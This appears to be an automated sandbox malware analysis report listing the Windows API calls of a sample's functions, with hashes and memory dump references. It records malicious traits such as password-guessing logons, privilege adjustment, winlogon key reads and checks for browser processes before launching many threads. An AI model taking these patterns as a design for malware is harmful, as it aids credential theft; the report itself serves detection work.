                                                                                                                                                                                                              • NetQueryDisplayInformation.NETAPI32(00000000,00000001,00000000,000003E8,000000FF,?,?,?,00000000,75C8DB30), ref: 00401EE2
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 00401F28
                                                                                                                                                                                                              • NetUserGetInfo.NETAPI32(00000000,00000000,00000001,?), ref: 00401F39
                                                                                                                                                                                                              • NetApiBufferFree.NETAPI32(?), ref: 00401F5A
                                                                                                                                                                                                              • NetApiBufferFree.NETAPI32(?), ref: 00401F65
                                                                                                                                                                                                                • Part of subcall function 004018E0: memset.MSVCRT ref: 0040190B
                                                                                                                                                                                                                • Part of subcall function 004018E0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,77305430,00000000,?), ref: 00401923
                                                                                                                                                                                                                • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000008,-00000011), ref: 0040194D
                                                                                                                                                                                                                • Part of subcall function 004018E0: HeapAlloc.KERNEL32(00000000), ref: 00401950
                                                                                                                                                                                                                • Part of subcall function 004018E0: memset.MSVCRT ref: 00401963
                                                                                                                                                                                                                • Part of subcall function 004018E0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000000), ref: 00401988
                                                                                                                                                                                                                • Part of subcall function 004018E0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000), ref: 0040199C
                                                                                                                                                                                                                • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000008,-00000011), ref: 004019BA
                                                                                                                                                                                                                • Part of subcall function 004018E0: HeapAlloc.KERNEL32(00000000), ref: 004019BD
                                                                                                                                                                                                                • Part of subcall function 004018E0: memset.MSVCRT ref: 004019CD
                                                                                                                                                                                                                • Part of subcall function 004018E0: MultiByteToWideChar.KERNEL32(00000000,00000000,00401F85,000000FF,00000000,00000000), ref: 004019EF
                                                                                                                                                                                                                • Part of subcall function 004018E0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000), ref: 00401A03
                                                                                                                                                                                                                • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000008,00000015), ref: 00401A23
                                                                                                                                                                                                                • Part of subcall function 004018E0: HeapAlloc.KERNEL32(00000000), ref: 00401A2A
                                                                                                                                                                                                                • Part of subcall function 004018E0: memset.MSVCRT ref: 00401A3A
                                                                                                                                                                                                                • Part of subcall function 004018E0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00401A57
                                                                                                                                                                                                                • Part of subcall function 004018E0: CreateProcessWithLogonW.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00401A8B
                                                                                                                                                                                                                • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000000,?), ref: 00401A9D
                                                                                                                                                                                                                • Part of subcall function 004018E0: HeapValidate.KERNEL32(00000000), ref: 00401AA6
                                                                                                                                                                                                                • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000000,?), ref: 00401AB2
                                                                                                                                                                                                                • Part of subcall function 004018E0: HeapFree.KERNEL32(00000000), ref: 00401AB5
                                                                                                                                                                                                                • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401AC2
                                                                                                                                                                                                                • Part of subcall function 004018E0: HeapValidate.KERNEL32(00000000), ref: 00401AC5
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 00401FCA
                                                                                                                                                                                                                • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401ACE
                                                                                                                                                                                                                • Part of subcall function 004018E0: HeapFree.KERNEL32(00000000), ref: 00401AD1
                                                                                                                                                                                                                • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000000,00401F85), ref: 00401AE1
                                                                                                                                                                                                                • Part of subcall function 004018E0: HeapValidate.KERNEL32(00000000), ref: 00401AE4
                                                                                                                                                                                                                • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000000,00401F85), ref: 00401AF1
                                                                                                                                                                                                                • Part of subcall function 004018E0: HeapFree.KERNEL32(00000000), ref: 00401AF4
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 0040200A
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 00402046
                                                                                                                                                                                                              • SwitchToThread.KERNEL32(?,?,00404D80,?,?,?), ref: 0040208F
                                                                                                                                                                                                              • NetApiBufferFree.NETAPI32(?), ref: 004020B5
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.1314203678.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_Z8eHwAvqAh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$ByteCharFreeMultiWide$_snprintfmemset$AllocBufferValidate$CreateDisplayFileInfoInformationLogonModuleNameQuerySwitchThreadUserWith
                                                                                                                                                                                                              • String ID: %s1$%s12$%s123
                                                                                                                                                                                                              • API String ID: 1588441251-2882894844
                                                                                                                                                                                                              • Opcode ID: 97f59b3fbf87337b1cbc6ae598f2ad5bd0982248879de21f7b69a44719f2851e
                                                                                                                                                                                                              • Instruction ID: f170fe93e02ccaf968bc2c6ae71e56240b4678089189b5983d08b015d4f9d182
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 97f59b3fbf87337b1cbc6ae598f2ad5bd0982248879de21f7b69a44719f2851e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 735184B25143016BD331EB54C984FEB73E8ABD8754F404A2EF6846B1D0DB78DA44CBA6
                                                                                                                                                                                                              Function 004028D0 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 34COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GlobalFindAtomA.KERNEL32(Wed Jul 6 06:49:26 20112,?,?,00402E9C), ref: 004028D9
                                                                                                                                                                                                              • GlobalAddAtomA.KERNEL32(Wed Jul 6 06:49:26 20112), ref: 004028EA
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 004028F6
                                                                                                                                                                                                              • RtlAdjustPrivilege.NTDLL ref: 00402906
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 0040290C
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.1314203678.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_Z8eHwAvqAh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AdminAtomGlobalUser$AdjustFindPrivilege
                                                                                                                                                                                                              • String ID: Pnfw$Wed Jul 6 06:49:26 20112$explorer.exe$winlogon.exe
                                                                                                                                                                                                              • API String ID: 3001685711-2220832649
                                                                                                                                                                                                              • Opcode ID: 83ac0b8a74455aed3f9fe13c08d3b3a7fcb0d139d0bb709980968f6615d0e93a
                                                                                                                                                                                                              • Instruction ID: 2c3c2cb6c74497f887580688acf30243e480456bbc90e7420e586ff1c8abd763
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 83ac0b8a74455aed3f9fe13c08d3b3a7fcb0d139d0bb709980968f6615d0e93a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3FF012B07542196AEA1067A1AE0AB5B3A5CDB84790F404177BF04F61D0DAB99C0185FD
                                                                                                                                                                                                              Function 00402FF0 Relevance: 13.5, APIs: 9, Instructions: 39memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00402FF7
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000300,004036DE,761DE610,00402FDE), ref: 0040300F
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 00403012
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000300), ref: 0040301F
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 00403022
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,004036DE,004036DE,761DE610,00402FDE), ref: 0040302B
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 0040302E
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,004036DE), ref: 0040303B
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 0040303E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.1314203678.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_Z8eHwAvqAh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$Free$Validate$String
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2629017576-0
                                                                                                                                                                                                              • Opcode ID: edeb09d6da527b41af017446eb360d9cd81bb1d2aa2956dafed66ea6837698d8
                                                                                                                                                                                                              • Instruction ID: 103af2a08650daedf0ea572f36775c75d91e7ca6a6ced768a9e875140008d5cd
                                                                                                                                                                                                              • Opcode Fuzzy Hash: edeb09d6da527b41af017446eb360d9cd81bb1d2aa2956dafed66ea6837698d8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E5F05EB56012117BEA206BB66D8CF572A6CEF88B82F084025B709F2180CA74CE109678
                                                                                                                                                                                                              Function 004015A0 Relevance: 10.6, APIs: 7, Instructions: 72processCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 004015C4
                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?,75C8DB30), ref: 004015CF
                                                                                                                                                                                                              • Process32First.KERNEL32 ref: 004015F5
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,?), ref: 00401610
                                                                                                                                                                                                              • Process32Next.KERNEL32(00000000,?), ref: 0040161C
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401638
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040164A
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.1314203678.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_Z8eHwAvqAh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HandleProcess32$CloseCreateFirstInformationNextSnapshotToolhelp32memset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3955875343-0
                                                                                                                                                                                                              • Opcode ID: 1da21db6c4adfa57a29160c47196a4ddbfb2d91636da1a720539600d1335a6ad
                                                                                                                                                                                                              • Instruction ID: d18670d365493a771e2935c97cc000c5a2e18494483a7794571357713e5f98ef
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1da21db6c4adfa57a29160c47196a4ddbfb2d91636da1a720539600d1335a6ad
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4111C6B25043106BD310EF55DC4899BBBD8EBE9361F04453AFA55A3290E335D9448BEA
                                                                                                                                                                                                              Function 00401420 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 48libraryloaderCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 0040144A
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(ntdll.dll,?,00402BAE,-00000006,00000000), ref: 00401457
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 00401463
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.1314203678.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_Z8eHwAvqAh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AddressCountHandleModuleProcTick
                                                                                                                                                                                                              • String ID: RtlUniform$ntdll.dll
                                                                                                                                                                                                              • API String ID: 1545651562-3277137149
                                                                                                                                                                                                              • Opcode ID: 846a4d946463fd889953915331e6662e7c5f164914c665561fc20ec9cc3dfa3e
                                                                                                                                                                                                              • Instruction ID: 5661f09ceaf7dd6985fdec3726855c2d4268d42b19af7d6053b1c23afd98fc53
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 846a4d946463fd889953915331e6662e7c5f164914c665561fc20ec9cc3dfa3e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3001DB716003049BC714ABBAAC829D6B79DDF89745300813AEB19E32E2C635DC488BAD
                                                                                                                                                                                                              Function 00401390 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 23libraryloaderCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 0040139B
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(ntdll.dll,?,00402BA2,00000000), ref: 004013AC
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 004013BC
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.1314203678.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_Z8eHwAvqAh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AddressCountHandleModuleProcTick
                                                                                                                                                                                                              • String ID: RtlUniform$ntdll.dll
                                                                                                                                                                                                              • API String ID: 1545651562-3277137149
                                                                                                                                                                                                              • Opcode ID: ffa31b1aa032498b302ac31cd015523b39c7887b3f6490af6b71b29526461ec5
                                                                                                                                                                                                              • Instruction ID: 972971b60caab807df67e590393efcb4d1d6a3813561f3a0b79f06a1da21d750
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ffa31b1aa032498b302ac31cd015523b39c7887b3f6490af6b71b29526461ec5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 69E01AB06203049BEB10AFB1AD09A5637DC9FC47413048032BB09F21A1DA38C8248B6D

                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                              Execution Coverage:0.7%
                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                              Signature Coverage:0%
                                                                                                                                                                                                              Total number of Nodes:40
                                                                                                                                                                                                              Total number of Limit Nodes:0
                                                                                                                                                                                                              execution_graph 51943 1281360 51982 12811d0 51943->51982 51945 128136f GetPEB 51946 1281090 GetPEB 51945->51946 51947 1281394 51946->51947 51948 1281000 GetPEB 51947->51948 51949 12813a0 51948->51949 51950 1281090 GetPEB 51949->51950 51951 12813a6 51950->51951 51952 1281619 51951->51952 51953 12813bc GetPEB 51951->51953 51955 1281000 GetPEB 51952->51955 51954 1281090 GetPEB 51953->51954 51959 12813d8 51954->51959 51956 1281625 51955->51956 51957 1281090 GetPEB 51956->51957 51958 128162b 51957->51958 51959->51952 51960 1281000 GetPEB 51959->51960 51961 128141b 51960->51961 51962 1281090 GetPEB 51961->51962 51963 1281421 51962->51963 51964 1281000 GetPEB 51963->51964 51965 1281441 51964->51965 51966 1281090 GetPEB 51965->51966 51980 1281447 51966->51980 51967 128158c 51968 1281000 GetPEB 51967->51968 51969 12815bd 51968->51969 51970 1281090 GetPEB 51969->51970 51971 12815c3 51970->51971 51972 12812c0 GetPEB 51971->51972 51973 12815de 51972->51973 51973->51952 51975 1281000 GetPEB 51973->51975 51974 1281090 GetPEB 51974->51980 51976 1281608 51975->51976 51978 1281090 GetPEB 51976->51978 51977 1281000 GetPEB 51977->51980 51979 128160e 51978->51979 51981 12f77c0 1938 API calls 51979->51981 51980->51952 51980->51967 51980->51974 51980->51977 51981->51952 51984 12811d5 51982->51984

                                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                                              Function 012F6CA0 Relevance: 296.7, APIs: 135, Strings: 34, Instructions: 960threadmemorysynchronizationCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 012E3300: #680.SHELL32 ref: 012E3325
                                                                                                                                                                                                                • Part of subcall function 012E3300: GetEnvironmentVariableA.KERNEL32(SystemDrive,?,00000104), ref: 012E3344
                                                                                                                                                                                                                • Part of subcall function 012E3300: PathAddBackslashA.SHLWAPI(?), ref: 012E3351
                                                                                                                                                                                                                • Part of subcall function 012E3300: GetVolumeInformationA.KERNEL32(?,00000000,00000000,000FF0FF,00000000,00000000,00000000,00000000), ref: 012E336E
                                                                                                                                                                                                                • Part of subcall function 012E3300: _snprintf.MSVCRT(?,00000104,01325748,000FF0FF), ref: 012E3389
                                                                                                                                                                                                                • Part of subcall function 012E3300: RegOpenKeyExA.ADVAPI32(80000002,software\microsoft\windows nt\currentversion\winlogon,00000000,00000101,00000000), ref: 012E33A7
                                                                                                                                                                                                                • Part of subcall function 012E3300: RegQueryValueExA.ADVAPI32(00000000,userinit,00000000,00000001,01339B58,00000104), ref: 012E33FC
                                                                                                                                                                                                                • Part of subcall function 012E3300: RegCloseKey.ADVAPI32(00000000), ref: 012E340A
                                                                                                                                                                                                                • Part of subcall function 01305A50: GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 01305A7F
                                                                                                                                                                                                                • Part of subcall function 01305A50: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00FFAAFF,00000000,00000000,00000000,00000000), ref: 01305AB8
                                                                                                                                                                                                                • Part of subcall function 01305A50: _snprintf.MSVCRT(9E2B3F07a,00000104,01325748,?,?), ref: 01305B23
                                                                                                                                                                                                              • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,01339D68), ref: 012F6CC0
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(01339D68), ref: 012F6CCB
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 012F6CDF
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\chrome.exe), ref: 012F6CFB
                                                                                                                                                                                                              • GetCommandLineA.KERNEL32 ref: 012F6D05
                                                                                                                                                                                                              • GetCommandLineW.KERNEL32 ref: 012F6D3D
                                                                                                                                                                                                              • InitializeCriticalSection.KERNEL32(0132FB68), ref: 012F6D65
                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 012F6D86
                                                                                                                                                                                                              • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 012F6DA4
                                                                                                                                                                                                              • GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?), ref: 012F6DC5
                                                                                                                                                                                                              • SetNamedSecurityInfoA.ADVAPI32(00000000,00000006,00000010,00000000,00000000,00000000,00000000), ref: 012F6DDF
                                                                                                                                                                                                              • LocalFree.KERNEL32(?), ref: 012F6DE9
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,012F3530,00000000,00000000,00000000), ref: 012F6E38
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 012F6E4C
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 012F6E5D
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,012F7DD0,00000000,00000000,00000000), ref: 012F6E8C
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 012F6EA0
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 012F6EB1
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,012F8080,00000000,00000000,00000000), ref: 012F6EC6
                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,9E2B3C2Da), ref: 012F6ED6
                                                                                                                                                                                                              • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 012F6EF6
                                                                                                                                                                                                              • GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?), ref: 012F6F17
                                                                                                                                                                                                              • SetNamedSecurityInfoA.ADVAPI32(9E2B3C2Da,00000006,00000010,00000000,00000000,00000000,00000000), ref: 012F6F34
                                                                                                                                                                                                              • LocalFree.KERNEL32(?), ref: 012F6F3E
                                                                                                                                                                                                              • InitializeCriticalSection.KERNEL32(0132FB80), ref: 012F6F49
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,012F79D0,00000000,00000000,00000000), ref: 012F6F5B
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 012F6F6B
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 012F6F7C
                                                                                                                                                                                                                • Part of subcall function 012E6DE0: memset.MSVCRT(?,00000000,0000040C,00000000,00000000), ref: 012E6E00
                                                                                                                                                                                                                • Part of subcall function 012E6DE0: Sleep.KERNEL32(000001F4,?,00000000,00000000), ref: 012E6E1C
                                                                                                                                                                                                                • Part of subcall function 012E6DE0: CreateThread.KERNEL32(00000000,00000000,012E6A90,00000000,00000000,00000000,774D0F10,?,00000000,00000000), ref: 012E6E78
                                                                                                                                                                                                                • Part of subcall function 012E6DE0: WaitForMultipleObjects.KERNEL32(00000040,?,00000001,000000FF,774D0F10,?,00000000,00000000), ref: 012E6EA0
                                                                                                                                                                                                                • Part of subcall function 012E6DE0: CloseHandle.KERNEL32(?,?,00000000,00000000), ref: 012E6EB8
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,012F6970,00000000,00000000,00000000), ref: 012F6F91
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 012F6FA1
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 012F6FB2
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,012F54B0,00000000,00000000,00000000,9E2B3F61a), ref: 012F6FDC
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 012F6FF0
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 012F7001
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 012F7010
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 012F7013
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 012F7020
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012F7023
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 012F7047
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 012F7059
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000000), ref: 012F7065
                                                                                                                                                                                                              • #680.SHELL32 ref: 012F7074
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\svchost.exe), ref: 012F7090
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\iexplore.exe), ref: 012F70B7
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\java.exe), ref: 012F70CD
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\javaw.exe), ref: 012F70E3
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\javaws.exe), ref: 012F70F9
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\opera.exe), ref: 012F710F
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\firefox.exe), ref: 012F7125
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\maxthon.exe), ref: 012F713B
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\avant.exe), ref: 012F7151
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\mnp.exe), ref: 012F7167
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\safari.exe), ref: 012F717D
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\netscape.exe), ref: 012F7193
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\tbb-firefox.exe), ref: 012F71A9
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\frd.exe), ref: 012F71BF
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\chrome.exe), ref: 012F71D5
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\explorer.exe), ref: 012F71EB
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,012FB8F0,00000000,00000000,00000000,00000000), ref: 012F7219
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 012F7233
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 012F7240
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,012FEF80,00000000,00000000,00000000), ref: 012F7255
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 012F7269
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 012F7276
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,01300560,00000000,00000000,00000000), ref: 012F728B
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 012F729F
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 012F72AC
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,01300E20,00000000,00000000,00000000), ref: 012F72C1
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 012F72D5
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 012F72E2
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,012FF6A0,00000000,00000000,00000000), ref: 012F72F7
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 012F730B
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 012F7318
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,012FCB80,00000000,00000000,00000000), ref: 012F732D
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 012F7341
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 012F734E
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,012FCC20,00000000,00000000,00000000), ref: 012F7363
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 012F7377
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 012F7384
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,01301590,00000000,00000000,00000000), ref: 012F7399
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 012F73AD
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 012F73BA
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,013024D0,00000000,00000000,00000000), ref: 012F73CF
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 012F73E3
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 012F73F0
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,013031C0,00000000,00000000,00000000), ref: 012F7405
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 012F7419
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 012F7426
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,013032B0,00000000,00000000,00000000), ref: 012F743B
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 012F744F
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 012F745C
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,012FFE80,00000000,00000000,00000000), ref: 012F7471
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 012F7485
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 012F7492
